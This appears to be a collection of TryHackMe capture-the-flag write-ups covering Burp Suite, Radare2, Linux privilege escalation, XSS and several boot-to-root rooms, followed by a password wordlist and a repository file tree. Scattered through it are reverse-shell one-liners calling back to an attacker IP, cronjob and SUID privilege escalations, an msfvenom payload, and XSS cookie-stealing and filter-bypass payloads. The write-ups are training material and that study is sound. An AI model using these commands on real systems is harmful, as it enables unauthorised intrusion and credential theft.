- Finally, click 'Start attack'. What is the first payload that returns a 200 status code, showing that we have successfully bypassed authentication?
- `** ** *****`
- Switch over to the HTTP history sub-tab of Proxy.
no answer needed
- We're going to dig for a response which issues a cookie. Parse through the various responses we've received from Juice Shop until you find one that includes a 'Set-Cookie' header.
no answer needed
- Once you've found a request response that issues a cookie, right-click on the request and select 'Send to Sequencer'.
no answer needed
- Change over Sequencer and select 'Start live capture'
no answer needed
- Let Sequencer run and collect ~10,000 requests. Once it hits roughly that amount hit 'Pause' and then 'Analyze now'
no answer needed
- Parse through the results. What is the effective estimated entropy measured in?
- `bits`
- In order to find the usable bits of entropy we often have to make some adjustments to have a normalized dataset. What item is converted in this process?
- `token`
- Read through the remaining results of the token analysis
no answer needed
- Let's first take a look at decoder by revisiting an old friend. Previously we discovered the scoreboard within the site JavaScript. Return to our target tab and find the API endpoint highlighted in the following request.
no answer needed
- Copy the first line of that request and paste it into Decoder. Next, select 'Decode as ...' URL
no answer needed
- What character does the %20 in the request we copied into Decoder decode as?
- `space`
- Similar to CyberChef, Decoder also has a 'Magic' mode where it will automatically attempt to decode the input it is provided. What is this mode called?
- `smart decode`
- What can we load into Comparer to see differences in what various user roles can access? This is very useful to check for access control issues.
- `site maps`
- Comparer can perform a diff against two different metrics, which one allows us to examine the data loaded in as-is rather than breaking it down into bytes?
- `words`
- To start, let's go ahead and switch over to the Options sub-tab of the Extender tab.
no answer needed
- Scroll down until you reach the 'Python Environment' section. Note, Burp requires the standalone edition of Jython.
no answer needed
- Download the standalone version of Jython from here: [Link](https://www.jython.org/download.html) - I suggest saving this or moving it to your Documents folder
no answer needed
- Return back to Burp and hit 'Select file' under the Python Environment subsection for Jython standalone. Navigate to where you just downloaded this file and select it.
no answer needed
- Burp is now set to go for installing extensions. Switch to the BApp Store sub-tab of Extender and look through the various extensions offered.
no answer needed
- Which extension allows us too bookmark various requests?
- `bookmarks`
- Download the report attached to this task. What is the only critical issue?
- `Cross-origin resource sharing: arbitrary origin trusted`
- How many 'Certain' low issues did Burp find?
- `12`
- Check out the provided links and keep learning!
no answer needed
================================================
FILE: CC:-Radare2/README.md
================================================
# CC: Radare2
- Read the above
no answer needed
- What flag you set to analyze the binary upon entering the r2 console (equivalent to running aaa once your inside the console)
- `-a`
- How do you enable the debugger?
- `-d`
- How do you open the file in write mode?
- `-w`
- How do you enter the console without opening a file
- `-`
- What command "Analyzes Everything" (all functions and their arguments: Same as running with radare with -A)
- `aaa`
- What command does basic analysis on functions?
- `af`
- How do you list all functions?
- `afl`
- How many functions are in the example1 binary?
- `r2 -d example1`
- `aaa`
- `afl`
- `12`
- What is the name of the secret function in the example1 binary?
- `secret_func`
- What command shows all the information about the file that you're in?
- `iA`
- How do you get every string that is present in the binary?
- `izz`
- What if you want the address of the main function?
- `iM`
- What character do you add to the end of every command to get the output in JSON format?
- `j`
- How do you get the entrypoint of the file?
- `ie`
- What is the secret string hidden in the example2 binary?
- `r2 -d example2`
- `aaa`
- `izz`
- `*******`
- How do you print out the the current memory address your located at in the binary?
- `s`
- What command do you use to go to a specific point in memory with the syntax `<command> <address>`?
- `s`
- What command would you run to go 5 bytes forward?
- `s+ 5`
- What about 12 bytes backward?
- `s- 12`
- How do you undo the previous seek?
- `s-`
- How would go to the memory address of the main function?
- `s main`
- What if you wanted to go to the address of the rax register?
- `sr rax`
- Play around with the s command in the example1 and example2 binaries
no answer needed
- How would you print the hex output of where you currently are in memory?
- `px`
- How would you print the disassembly of where you're currently at in memory?
- `pd`
- What if you wanted the disassembly of the main function?
- `pd f main`
- What command prints out the emoji hexdump? (this is not useful at all I just find it funny)
- `pxe`
- What if you decided you were too good for rows and you wanted the disassembly in column format?
- `pc`
- What is the value of the first variable in the main function for the example 3 binary?
- `r2 -d example3`
- `aaa`
- `pdf @ main`
- `1`
- What about the second variable?
- `5`
- How many functions are in the binary?
- `r2 -d midterm`
- `aaa`
- `afl`
- `13`
- What is the value of the hidden string?
- `izz`
- `you*******me`
- What is the return value of `secret_func()`?
- `pdf @ sym.secret_func`
- `4`
- What is the value of the first variable set in the main function(in decimal format)?
- `pdf @ main`
- `12`
- What about the second one(also in decimal format)?
- `192`
- What is the next function in memory after the main function?
- `afl`
- `*******_func`
- How do you get a hexdump of four bytes of the memory address your currently at?
- `px 2`
- How do you set a breakpoint?
- `db`
- What command is used to print out the values of all the registers?
- `dr`
- How do you run through the program until the program either ends or you hit the next breakpoint?
- `dc`
- What if you want to step through the binary one line at a time?
- `ds`
- How do you go forth 2 lines in the binary?
- `ds 2`
- How do you list out the indexes and memory addresses of all breakpoints?
- `dbi`
- Go back through all previous binaries and mess around with debug mode.
no answer needed
- How do you enter "graph mode" which allows everything to be organized in nice readable boxes?(A personal favorite of mine. Also note that the second character is uppercase)
- `vV`
- What character do you press to run normal radare commands inside visual mode?
- `:`
- How do you go back to the regular radare shell(leaving visual mode)?
- `q`
- What if you want to step through the binary inside Visual mode?
- `s`
- How do you add a comment?
- `;`
- Look through any of the binaries in Visual Mode and see just how much more beautiful everything looks.
no answer needed
- How do you write a string to the current memory address.
- `w`
- What command lists all write changes?
- `wc`
- What command modifies an instruction at the current memory address?
- `wa`
- Get the example4 binary to show the You win! message
no answer needed
- What is the password that outputs the you win! message?
- `r2 -d the_final_exam`
- `aaa`
- `afl`
- `pdf @ main`
- `pdf @ sym.get_password`
- `db 0x5635b2cf682f`
- `dc`
- `edordottt`
- `dr`
- `s 0xffffffffffffffda`
- `px 10`
- `onykbnyddd`
- So it's ROT-10
- `********`
================================================
FILE: CTF-collection-Vol.1/README.md
================================================
# CTF collection Vol.1
- High five!
no answer needed
- Feed me the flag!
- `echo "VEhNe2p1NTdfZDNjMGQzXzdoM19iNDUzfQ==" | base64 -d`
- `THM{********************}`
- I'm hungry, I need the flag.
- `exiftool Findme.jpg`
- `THM{************}`
- It is sad. Feed me the flag.
- `steghide info Extinction.jpg` and then `y`
- `steghide extract -sf Extinction.jpg` and then enter (without passphrase)
- `cat Final_messge.txt`
- `THM{********************************}`
- Did you find the flag?
- Highlight the text or check the page source code.
- `THM{**********}`
- More flag please!
- Download the image and check the QR code.
- `THM{*****************}`
- Found the flag?
- `strings hello.hello | grep THM`
- `THM{******************}`
- Oh, Oh, Did you get it?
- Visit [CyberChef](https://gchq.github.io/CyberChef)
- Recipe from Base58
- `THM{*********************}`
- What did you get?
- Caesar Cipher (19)
- `THM{***************}`
- I'm hungry now... I need the flag
- Check the HTML source code
- `THM{***********************}`
- What is the content?
- `xxd --plain spoil.png > hex.txt`
- Replace the first 8 characters with `89504E47`
- Go to Cyberchef and the recipe is `From Hex` and then `Render Image`.
- `THM{**********}`
- Did you found the hidden flag?
- Just search `Tryhackme reddit`
- `THM{********************************}`
- Can you decode it?
- Search on Google for BinaryFuck Interpreter
- `THM{**********}`
- Did you crack it? Feed me now!
- [XOR Calculator](http://xor.pw/#) and output as ASCII.
- `THM{************}`
- Flag! Flag! Flag!
- `binwalk hell.jpg -e`
- `cd _hell.jpg.extracted`
- `cat hello_there.txt`
- `THM{****************}`
- What does the flag said?
- `wget http://www.caesum.com/handbook/Stegsolve.jar -O stegsolve.jar
chmod +x stegsolve.jar`
- `./stegsolve.jar`
- Open the dark.png file and try to see the flag with the arrows.
- `THM{**********************}`
- What does the bot said?
- Follow the link on the QR code and play the track.
- `THM{**********}`
- Did you found my past?
- Use wayback (https://web.archive.org/web/20200102131252/https://www.embeddedhacker.com/)
- Load the snapshot on Jan 2, 2020.
- Search for string `THM{` on the page.
- `THM{******************}`
- The deciphered text
- Input `MYKAHODTQ{RVG_YVGGK_FAL_WXF}` in [CyberChef](https://gchq.github.io/CyberChef/) with recipe Vigenere Decode and key=TRYHACKME.
- Output is `THMTHMTHM{*****************}`
- Change the key to `THMTHMTHM`
- `TRYHACKME{*****************}`
- What is the flag?
- `python3`
- `n = 581695969015253365094191591547859387620042736036246486373595515576333693`
- `h = hex(n)[2:]`
- `bytearray.fromhex(h).decode()`
- `THM{***********************}`
- Did you captured my neighbor's flag?
- Open the file with Wireshark.
- `THM{****************}`
================================================
FILE: Chill-Hack/README.md
================================================
# Chill Hack
- User Flag
- `scilla port -target <TARGET_IP> -p -1000`
- `ftp <TARGET_IP>`
- `anonymous`, no password
- `get note.txt`
- `scilla dir -target <TARGET_IP>`
- secret directory found.
- Execute `cat /etc/passwd`. ahahhahahahahahahhaa.
- So, execute `cat</etc/passwd`
- `nc -lnvp 1234`
- `r"m" /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <YOUR_IP> 1234 >/tmp/f`
- Cool.
- `python3 -c 'import pty;pty.spawn("/bin/bash")'`
- `cd /home`
- `sudo -l`
- `cd apaar`
- `sudo -u apaar /home/apaar/.helpline.sh`
- `/bin/sh` and `/bin/sh`
- `id`
- `cat local.txt`
- `{USER-FLAG: *********************************}`
- Root Flag
- `wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh`
- `python3 -m http.server`
- On target `curl <YOUR_IP>:8000/LinEnum.sh > linenum.sh`
- `chmod +x linenum.sh`
- `./linenum.sh`
~~~
[-] Listening TCP:
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:9001 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
~~~
- On your machine `ssh-keygen`
- `cd ~/.ssh`
- `python3 -m http.server`
- On target `curl <YOUR_IP>:8000/id_rsa.pub > ~/.ssh/authorized_keys`
- `chmod 600 id_rsa`
- `ssh -L 9001:127.0.0.1:9001 -i id_rsa apaar@<TARGET_IP>`
- `cat /var/www/files/index.php`
- Found username and password for MySQL database.
- `mysql -u root -p` and enter the password found.
- `show databases;`
- `use webportal;`
- `show tables;`
- `select * from users;`
- Save those two hashes
- `john --format=Raw-MD5 --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt`
- Login into the website at localhost:9001
- Download the image and execute `steghide extract -sf hacker-with-laptop_23-2147985341.jpg`
- `fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u backup.zip`
- Inspect `source_code.php`
- `echo ******************** | base64 -d`
- `su anurodh` and enter password
- `docker images`
- `docker run -v /root:/mnt -it alpine`
- `cat /mnt/proof.txt`
- `{ROOT-FLAG: ********************************}`
================================================
FILE: Common-Linux-Privesc/README.md
================================================
# Common Linux Privesc
- Deploy the machine
no answer needed
- Read the information about privilege escalation
no answer needed
- Understand the difference between Horizontal and Vertical privilege escalation.
no answer needed
- First, lets SSH into the target machine, using the credentials user3:password. This is to simulate getting a foothold on the system as a normal privilege user.
- `ssh user3@<TARGET_IP>`, `yes` and insert password.
- On your machine `wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh`
- On your machine `sudo python3 -m http.server`
- On target `wget http://<YOUR_IP>:8000/LinEnum.sh`
- `chmod +x LinEnum.sh`
- `./LinEnum.sh`
- What is the target's hostname?
- `polobox`
- Look at the output of /etc/passwd how many "user[x]" are there on the system?
- `8`
- How many available shells are there on the system?
- `4`
- What is the name of the bash script that is set to run every 5 minutes by cron?
- `autoscript.sh`
- What critical file has had its permissions changed to allow some users to write to it?
- `/etc/passwd`
- Well done! Bear the results of the enumeration stage in mind as we continue to exploit the system!
no answer needed
- What is the path of the file in user3's directory that stands out to you?
- `/home/user3/shell`
- We know that "shell" is an SUID bit file, therefore running it will run the script as a root user! Lets run it! We can do this by running: "./shell"
no answer needed
- Congratulations! You should now have a shell as root user, well done!
no answer needed
- First, let's exit out of root from our previous task by typing "exit". Then use "su" to swap to user7, with the password "password"
no answer needed
- Having read the information above, what direction privilege escalation is this attack?
- `vertical`
- Before we add our new user, we first need to create a compliant password hash to add! We do this by using the command: "openssl passwd -1 -salt [salt] [password]" What is the hash created by using this command with the salt, "new" and the password "123"?
- `***********************`
- Great! Now we need to take this value, and create a new root user account. What would the /etc/passwd entry look like for a root user with the username "new" and the password hash we created before?
- Read the hint
- `*************************************************`
- Great! Now you've got everything you need. Just add that entry to the end of the /etc/passwd file!
no answer needed
- Now, use "su" to login as the "new" account, and then enter the password. If you've done everything correctly- you should be greeted by a root prompt! Congratulations!
no answer needed
- First, let's exit out of root from our previous task by typing "exit". Then use "su" to swap to user8, with the password "password"
no answer needed
- Let's use the "sudo -l" command, what does this user require (or not require) to run vi as root?
- `NOPASSWD`
- So, all we need to do is open vi as root, by typing "sudo vi" into the terminal.
no answer needed
- Now, type ":!sh" to open a shell!
no answer needed
- First, let's exit out of root from our previous task by typing "exit". Then use "su" to swap to user4, with the password "password"
no answer needed
- Now, on our host machine- let's create a payload for our cron exploit using msfvenom.
no answer needed
- What is the flag to specify a payload in msfvenom?
- `-p`
- Create a payload using: `msfvenom -p cmd/unix/reverse_netcat lhost=LOCALIP lport=8888 R`
no answer needed
- What directory is the "autoscript.sh" under?
- `/home/user4/Desktop`
- Lets replace the contents of the file with our payload using: "echo [MSFVENOM OUTPUT] > autoscript.sh"
no answer needed
- After copying the code into autoscript.sh file we wait for cron to execute the file, and start our netcat listener using: "nc -lvp 8888" and wait for our shell to land!
no answer needed
- After about 5 minutes, you should have a shell as root land in your netcat listening session! Congratulations!
no answer needed
- Going back to our local ssh session, not the netcat root session, you can close that now, let's exit out of root from our previous task by typing "exit". Then use "su" to swap to user5, with the password "password"
no answer needed
- Let's go to user5's home directory, and run the file "script". What command do we think that it's executing?
- `ls`
- Now we know what command to imitate, let's change directory to "tmp".
no answer needed
- Now we're inside tmp, let's create an imitation executable. The format for what we want to do is: echo "[whatever command we want to run]" > [name of the executable we're imitating] What would the command look like to open a bash shell, writing to a file with the name of the executable we're imitating
- `echo "/bin/bash" > ls`
- Great! Now we've made our imitation, we need to make it an executable. What command do we execute to do this?
- `chmod +x ls`
- Now, we need to change the PATH variable, so that it points to the directory where we have our imitation "ls" stored! We do this using the command "export PATH=/tmp:$PATH". Note, this will cause you to open a bash prompt every time you use "ls". If you need to use "ls" before you finish the exploit, use "/bin/ls" where the real "ls" executable is. Once you've finished the exploit, you can exit out of root and use "export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:$PATH" to reset the PATH variable back to default, letting you use "ls" again!
no answer needed
- Now, change directory back to user5's home directory.
no answer needed
- Now, run the "script" file again, you should be sent into a root bash prompt! Congratulations!
no answer needed
- Well done, you did it!
no answer needed
================================================
FILE: Cross-site-Scripting/README.md
================================================
# Cross-site Scripting
- Read the introduction.
no answer needed
- Deploy the machine and navigate to http://<TARGET_IP>
no answer needed
- The machine you deployed earlier will guide you though exploiting some cool vulnerabilities, stored XSS has to offer. There are hints for answering these questions on the machine.
no answer needed
- Add a comment and see if you can insert some of your own HTML.
- `<p>comment</p>`
- `HTML_****`
- Create an alert popup box appear on the page with your document cookies.
- `<script>alert(document.cookie)</script>`
- `W3LL_***********`
- Change "XSS Playground" to "I am a hacker" by adding comments and using Javascript.
- ` <script>document.getElementById('thm-title').innerHTML="I am a hacker"</script>`
- `websites****************************`
- Take over Jack's account by stealing his cookie, what was his cookie value?
- `s%3Aat0YY*******************************************************`
- Post a comment as Jack.
- `c00k***********`
- Craft a reflected XSS payload that will cause a popup saying "Hello"
- `<script>alert("Hello")</script>`
- `There**************************`
- Craft a reflected XSS payload that will cause a popup with your machines IP address.
- `<script>alert(window.location.hostname)</script>`
- `Ref***************`
- Look at the deployed machines DOM-Based XSS page source code, and figure out a way to exploit it by executing an alert with your cookies.
- `test ' onmouseover="alert(document.cookie)"`
- `Br******************`
- Create an onhover event on an image tag, that change the background color of the website to red.
- `test " onhover="document.body.style.backgroundColor='red'`
- `Jav**************`
- Understand the basic proof of concept script.
no answer needed
- Create your own version of an XSS keylogger and see it appear in the logs part of the site.
no answer needed
- Bypass the filter that removes any script tags.
- `<img src="edoardottt" onerror=alert("Helloooo") />`
- `3c3cf****************************`
- The word alert is filtered, bypass it.
- The same but with `confirm`.
- `a2e5e*****************************`
- The word hello is filtered, bypass it.
- The same but with payload `Hi :)`.
- `decb*****************************`
- Filtered in challenge 4 is as follows...
- `<img src="edoardottt" ONERROR="alert('edoardottt')" />`
- `2482d2****************************`
- Download and experiment with BeEF with the XSS playground.
no answer needed
- Take a look at XSS-Payloads.com, download one interesting looking payload and use it on the XSS playground.
no answer needed
================================================
FILE: Cyborg/README.md
================================================
# Cyborg
- Deploy the machine
no answer needed
- Scan the machine, how many ports are open?
- `scilla port -target <TARGET_IP>`
- `*`
- What service is running on port 22?
- `ssh`
- What service is running on port 80?
- `http`
- What is the user.txt flag?
- Go to `<TARGET_IP>/etc`
- And you find `http://<TARGET_IP>/etc/squid/passwd`
- So you have found something like `username:password`.
- `hash-identifier` and paste the password.
- `echo password > hash`
- `hashcat --force -m 1600 -a 0 hash /home/kali/rockyou.txt`
- `ssh username@<TARGET_IP>` and enter the password.
- It seems a password file...
- `scilla dir -target <TARGET_IP>`
- `/admin/` found!
- Go to admin page and download the archive.tar file.
- `tar -xvf archive.tar`
- This is a [Borg](https://borgbackup.readthedocs.io/en/stable/) things.
- Install borg.
- `borg extract archive.tar::music_archive`
- You found the ssh credentials.
- `ssh ****@<TARGET_IP>` and enter the password.
- `cat user.txt`
- `flag{************************************}`
- What is the root.txt flag?
- `sudo -l`
- `cat /etc/mp3backups/backup.sh`
- `sudo /etc/mp3backups/backup.sh -c "chmod +s /bin/bash"`
- `bash -p`
- `cat /root/root.txt`
- `flag{***********************************}`
================================================
FILE: Easy-Peasy/README.md
================================================
# Easy Peasy
- How many ports are open?
- `nmap <TARGET_IP>`
- `3`
- What is the version of nginx?
- `nmap -sV <TARGET_IP>`
- `1.16.1`
- What is running on the highest port?
- `apache`
- Using GoBuster, find flag 1.
- `gobuster dir -u http://<TARGET_IP>/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt`
- We find `/hidden`.
- Go in depth. `gobuster dir -u http://<TARGET_IP>/hidden/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt`
- We find `/whatever`
- Inspect page source.
- `ZmxhZ3tmMXJzN19mbDRnfQ==`
- `echo -n ZmxhZ3tmMXJzN19mbDRnfQ== | base64 -d`
- `flag{f1rs7_fl4g}`
- Further enumerate the machine, what is flag 2?
- I remember you there is another server public exposed. Go to `http://<TARGET_IP>:65524`.
- With the same previous command of gobuster we can see there is a robots.txt file.
- `a18672860d0510e5ab6699730763b250`
- `hash-identifier`
- Just search on google
- `flag{1m_s3c0nd_fl4g}`
- Crack the hash with easypeasy.txt, What is the flag 3?
- Inspect source code of default Apache page.
- `flag{9fdafbd64c47471a8f54cd3fc64cd312}`
- What is the hidden directory?
- Looking at the second server (apache) index page source code I found `its encoded with ba....:ObsJmP173N2X6dOrAgEAL0Vu`.
- Play a bit with CyberChef.
- `/n0th1ng3ls3m4tt3r` (base62).
- Using the wordlist that provided to you in this task crack the hash
what is the password?
- Go to this directory with a browser and inspect source code.
- `940d71e8655*********8ab85066**********418**********83e7f5fe6*d81`
- `hash-identifier`
- `john --wordlist=easypeasy.txt --format=gost hash.txt`
- `mypass*************`
- What is the password to login to the machine via SSH?
- Download the central image on the page (`http://<TARGET_IP>:65524/n0th1ng3ls3m4tt3r`)
- `steghide extract -sf binarycodepixabay.jpg` and enter the password.
- In the new file you will have a username and a binary password.
- Just convert to text the binary code.
- `***********************binary`
- What is the user flag?
- Login into ssh (not port 22, remember the output of nmap).
- `cat user.txt`
- This isn't the real flag. Just use ROT13.
- `flag{n0wi************}`
- What is the root flag?
- Try to search something related to cronjob.
- `cat /etc/crontab`
- uuuuuuuuh `/var/www/.mysecretcronjob.sh`
- This code will be executed as root, so:
- Insert this on that file: `/bin/bash -i >& /dev/tcp/<YOUR_IP>/4444 0>&1`
- On your machine `nc -lnvp 4444`
- `cat /root/flag.txt` ......
- wat?
- oH. Ok. `cat /root/.root.txt`
- `flag{63a**0e******05079**********1845}`
================================================
FILE: Easy-Peasy/easypeasy.txt
================================================
123456
12345
123456789
password
iloveyou
princess
1234567
rockyou
louise
orange
789456
999999
shorty
11111
12345678
abc123
nicole
daniel
babygirl
monkey
lovely
jessica
654321
michael
ashley
qwerty
111111
iloveu
000000
michelle
tigger
sunshine
12345678
abc123
nicole
daniel
babygirl
monkey
lovely
jessica
654321
michael
ashley
qwerty
111111
iloveu
000000
michelle
123456
12345
123456789
password
iloveyou
princess
1234567
rockyou
12345678
abc123
nicole
123456
12345
123456789
password
iloveyou
princess
1234567
rockyou
12345678
abc123
nicole
daniel
babygirl
monkey
lovely
jessica
654321
michael
ashley
qwerty
111111
iloveu
daniel
babygirl
monkey
lovely
jessica
654321
michael
ashley
qwerty
111111
iloveu
tigger
sunshine
chocolate
password1
soccer
anthony
paintball
love4u
gitextract_yp03w5iw/
├── .github/
│ ├── FUNDING.yml
│ ├── ISSUE_TEMPLATE/
│ │ └── bug_report.md
│ └── auto_assign.yml
├── Active-Directory-Basics/
│ └── README.md
├── Advent-of-Cyber-2020/
│ ├── Day-01-A_Christmas_Crisis/
│ │ └── README.md
│ ├── Day-02-The_Elf_Strikes_Back!/
│ │ ├── README.md
│ │ └── reverse.jpeg.php
│ ├── Day-03-Christmas_Chaos/
│ │ └── README.md
│ ├── Day-04-Santa's_watching/
│ │ ├── README.md
│ │ └── create_list.py
│ ├── Day-05-Someone_stole_Santa's_gift_list!/
│ │ └── README.md
│ ├── Day-06-Be_careful_with_what_you_wish_on_a_Christmas_night/
│ │ └── README.md
│ ├── Day-07-The_Grinch_Really_Did_Steal_Christmas/
│ │ ├── %2f
│ │ ├── README.md
│ │ ├── elf_mcskidy_wishlist.txt
│ │ ├── pcap1.pcap
│ │ ├── pcap2.pcap
│ │ └── pcap3.pcap
│ ├── Day-08-What's_Under_the_Christmas_Tree?/
│ │ └── README.md
│ ├── Day-09-Anyone_can_be_Santa!/
│ │ ├── README.md
│ │ ├── backup.sh
│ │ ├── old_backup.sh
│ │ └── shoppinglist.txt
│ ├── Day-10-Dont-be-sElfish/
│ │ ├── README.md
│ │ └── note_from_mcskidy.txt
│ ├── Day-11-The_Rogue_Gnome/
│ │ ├── LinEnum.sh
│ │ └── README.md
│ ├── Day-12-Ready,_set,_elf./
│ │ └── README.md
│ ├── Day-13-Coal_for_Christmas/
│ │ ├── README.md
│ │ └── dirty.c
│ ├── Day-14-Where's Rudolph?/
│ │ └── README.md
│ ├── Day-15-There's a Python in my stocking!/
│ │ └── README.md
│ ├── Day-16-Help! Where is Santa?/
│ │ ├── README.md
│ │ └── api_fuzzer.py
│ ├── Day-17-ReverseELFneering/
│ │ └── README.md
│ ├── Day-18-The_Bits_of_Christmas/
│ │ └── README.md
│ ├── Day-19-The_Naughty_or_Nice_List/
│ │ └── README.md
│ ├── Day-20-PowershELlF_to_the_rescue/
│ │ └── README.md
│ ├── Day-21-Time_for_some_ELForensics/
│ │ └── README.md
│ ├── Day-22-Elf_McEager_becomes_CyberElf/
│ │ └── README.md
│ ├── Day-23-The_Grinch_strikes_again!/
│ │ └── README.md
│ ├── Day-24-The_Trial_Before_Christmas/
│ │ └── README.md
│ └── README.md
├── Advent-of-Cyber-2021/
│ ├── Day-01-Save_The_Gifts/
│ │ └── README.md
│ ├── Day-02-Elf_HR_Problems/
│ │ └── README.md
│ ├── Day-03-Christmas_Blackout/
│ │ └── README.md
│ ├── Day-04-Santas_Running_Behind/
│ │ └── README.md
│ ├── Day-05-Pesky_Elf_Forum/
│ │ └── README.md
│ ├── Day-06-Patch_Management_Is_Hard/
│ │ └── README.md
│ ├── Day-07-Migration_Without_Security/
│ │ └── README.md
│ ├── Day-08-Santas_Bag_of_Toys/
│ │ └── README.md
│ ├── Day-09-Where_Is_All_This_Data_Going/
│ │ ├── AoC3.pcap
│ │ └── README.md
│ ├── Day-10-Offensive_Is_The_Best_Defence/
│ │ └── README.md
│ ├── Day-11-Where_Are_The_Reindeers/
│ │ └── README.md
│ ├── Day-12-Sharing_Without_Caring/
│ │ └── README.md
│ ├── Day-13-They_Lost_The_Plan/
│ │ └── README.md
│ ├── Day-14-Dev(Insecure)Ops/
│ │ └── README.md
│ ├── Day-15-The_Grinchs_day_off/
│ │ └── README.md
│ ├── Day-16-Ransomware_Madness/
│ │ └── README.md
│ ├── Day-17-Elf_Leaks/
│ │ └── README.md
│ ├── Day-18-Playing_With_Containers/
│ │ └── README.md
│ ├── Day-19-Something_Phishy_Is_Going_On/
│ │ └── README.md
│ ├── Day-20-What_s_the_Worst_That_Could_Happen/
│ │ └── README.md
│ ├── Day-21-Needles_In_Computer_Stacks/
│ │ └── README.md
│ ├── Day-22-How_It_Happened/
│ │ └── README.md
│ ├── Day-23-PowershELlF_Magic/
│ │ └── README.md
│ ├── Day-24-Learning_From_The_Grinch/
│ │ └── README.md
│ └── README.md
├── Agent-Sudo/
│ ├── README.md
│ ├── To_agentJ.txt
│ ├── _cutie.png.extracted/
│ │ ├── 365
│ │ ├── 365.zlib
│ │ ├── To_agentR.txt
│ │ └── zip.hash
│ └── message.txt
├── Anonymous/
│ └── README.md
├── Attacking-Kerberos/
│ └── README.md
├── Attacktive-Directory/
│ └── README.md
├── Authenticate/
│ └── README.md
├── Avengers-Blog/
│ └── README.md
├── Baron-Samedit/
│ └── README.md
├── Bash-Scripting/
│ └── README.md
├── Bebop/
│ └── README.md
├── Bolt/
│ └── README.md
├── Bounty-Hacker/
│ ├── README.md
│ ├── locks.txt
│ └── task.txt
├── Brooklyn-Nine-Nine/
│ └── README.md
├── Brute-It/
│ └── README.md
├── Burp-Suite/
│ └── README.md
├── CC:-Radare2/
│ └── README.md
├── CTF-collection-Vol.1/
│ └── README.md
├── Chill-Hack/
│ └── README.md
├── Common-Linux-Privesc/
│ └── README.md
├── Cross-site-Scripting/
│ └── README.md
├── Cyborg/
│ └── README.md
├── Easy-Peasy/
│ ├── README.md
│ ├── easypeasy.txt
│ ├── hash.txt
│ └── secrettext.txt
├── Encryption-Crypto-101/
│ └── README.md
├── Erit-Securus-I/
│ └── README.md
├── Game-Zone/
│ └── README.md
├── GamingServer/
│ └── README.md
├── Geolocating-Images/
│ └── README.md
├── Getting-Started/
│ └── README.md
├── GoldenEye/
│ └── README.md
├── Gotta-Catch'em-All/
│ └── README.md
├── Hacking-with-Powershell/
│ └── README.md
├── Hardening-Basics-Part-1/
│ └── README.md
├── Hardening-Basics-Part-2/
│ └── README.md
├── Hashing-Crypto_101/
│ └── README.md
├── HeartBleed/
│ └── README.md
├── Intro-PoC-Scripting/
│ └── README.md
├── Intro-to-Python/
│ ├── README.md
│ └── decode.py
├── Intro-to-Windows/
│ └── README.md
├── Introduction-to-Django/
│ └── README.md
├── Introduction-to-Flask/
│ └── README.md
├── Introduction-to-OWASP-ZAP/
│ └── README.md
├── Introductory-Networking/
│ └── README.md
├── JavaScript-Basics/
│ ├── README.md
│ └── sort.js
├── John-The-Ripper/
│ └── README.md
├── Jurassic-Park/
│ └── README.md
├── LFI/
│ └── README.md
├── LFI-Basics/
│ └── README.md
├── LICENSE
├── LazyAdmin/
│ ├── README.md
│ ├── hash.txt
│ ├── mysql_bakup_20191129023059-1.5.1.sql
│ └── rshell.php
├── Linux-Challenges/
│ └── README.md
├── Linux-Fundamentals/
│ ├── Linux-Fundamentals-Part-1/
│ │ └── README.md
│ ├── Linux-Fundamentals-Part-2/
│ │ └── README.md
│ └── Linux-Fundamentals-Part-3/
│ └── README.md
├── Linux-Strength-Training/
│ └── README.md
├── Linux:-Local-Enumeration/
│ └── README.md
├── MAL:-REMnux-The_Redux/
│ └── README.md
├── NIS-Linux_Part_I/
│ └── README.md
├── Nessus/
│ └── README.md
├── Network-Services/
│ └── README.md
├── Network-Services-2/
│ └── README.md
├── Networking/
│ └── README.md
├── Ninja-Skills/
│ └── README.md
├── Nmap/
│ └── README.md
├── OWASP-Juice-Shop/
│ ├── README.md
│ └── ftp/
│ ├── acquisitions.md
│ ├── announcement_encrypted.md
│ ├── coupons_2013.md.bak%00..md
│ ├── eastere.gg%00.md
│ ├── encrypt.pyc%00.md
│ ├── incident-support.kdbx
│ ├── legal.md
│ ├── package.json.bak%00.md
│ ├── quarantine/
│ │ ├── juicy_malware_linux_amd_64.url
│ │ ├── juicy_malware_linux_arm_64.url
│ │ ├── juicy_malware_macos_64.url
│ │ └── juicy_malware_windows_64.exe.url
│ └── suspicious_errors.yml%00.md
├── OWASP-Top-10/
│ ├── 47887.py
│ ├── 48973.txt
│ ├── README.md
│ ├── login-logs.txt
│ └── rce.py
├── Overpass/
│ ├── README.md
│ └── downloads/
│ └── src/
│ └── buildscript.sh
├── Overpass2-Hacked/
│ ├── README.md
│ ├── fasttrack.txt
│ └── overpass2.pcapng
├── Persistence/
│ └── README.md
├── Pickle-Rick/
│ ├── README.md
│ └── reverse-shell.sh
├── Post-Exploitation-Basics/
│ └── README.md
├── README.md
├── Regular-expressions/
│ └── README.md
├── Res/
│ └── README.md
├── RootMe/
│ ├── README.md
│ └── reverse-shell.php5
├── SSRF/
│ └── README.md
├── Searchlight-IMINT/
│ └── README.md
├── Skynet/
│ └── README.md
├── Starting-Out-In-Cyber-Sec/
│ └── README.md
├── Startup/
│ ├── README.md
│ ├── notice.txt
│ └── suspicious.pcapng
├── Steel-Mountain/
│ └── README.md
├── Sublist3r/
│ ├── README.md
│ └── sub-output-nbc.txt
├── The-Cod-Caper/
│ └── README.md
├── The-find-command/
│ └── README.md
├── Toolbox-Vim/
│ └── README.md
├── ToolsRus/
│ └── README.md
├── Tor/
│ └── README.md
├── Upload-Vulnerabilities/
│ └── README.md
├── Web-Scanning/
│ └── README.md
